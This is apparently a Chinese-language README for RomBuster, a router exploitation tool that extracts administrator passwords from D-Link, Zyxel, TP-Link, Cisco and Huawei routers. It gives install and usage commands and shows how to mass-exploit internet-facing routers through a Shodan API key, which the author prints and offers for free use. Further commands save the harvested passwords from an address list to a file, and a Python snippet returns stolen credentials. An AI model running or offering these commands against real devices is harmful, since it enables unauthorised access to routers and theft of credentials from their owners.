RomBuster 是一款路由器利用工具,能够泄露网络路由器的管理员密码。
D-Link、Zyxel、TP-Link、Cisco 和 Huawei。pip3 install git+https://github.com/EntySec/RomBuster
要使用 RomBuster,只需在终端中输入 rombuster。
usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
[--zoomeye ZOOMEYE] [-p PAGES]
RomBuster 是一款路由器利用工具,能够泄露网络路由器的管理员密码。
可选参数:
-h, --help 显示此帮助信息并退出
-o OUTPUT, --output OUTPUT
将结果输出到文件。
-i INPUT, --input INPUT
地址输入文件。
-a ADDRESS, --address ADDRESS
单个地址。
--shodan SHODAN 用于通过互联网利用设备的 Shodan API 密钥。
--zoomeye ZOOMEYE 用于通过互联网利用设备的 ZoomEye API 密钥。
-p PAGES, --pages PAGES
你想从 ZoomEye 获取的页数。
利用单个路由器
让我们为了娱乐而入侵我的路由器。
rombuster -a 192.168.99.1
利用来自互联网的路由器
让我们尝试使用 Shodan 搜索引擎来利用互联网上的路由器。
rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注意: 给出的 Shodan API 密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是我的 PRO API 密钥,你可以使用此密钥或你自己的密钥,欢迎免费使用我们所有的资源 :)
从输入文件中利用路由器
让我们尝试使用开放的路由器数据库。
rombuster -i routers.txt -o passwords.txt
注意: 它将利用 routers.txt 列表中的所有路由器(按地址),并将所有获得的密码保存到 passwords.txt。
RomBuster 还拥有自己的 Python API,可以通过将 RomBuster 导入到你的代码中来调用。
from rombuster import RomBuster
以下是 RomBuster 的所有基本函数,可用于利用指定的路由器。
exploit(address) – 利用给定地址的单个路由器。利用单个路由器
from rombuster import RomBuster
rombuster = RomBuster()
creds = rombuster.exploit('192.168.99.1')
print(creds)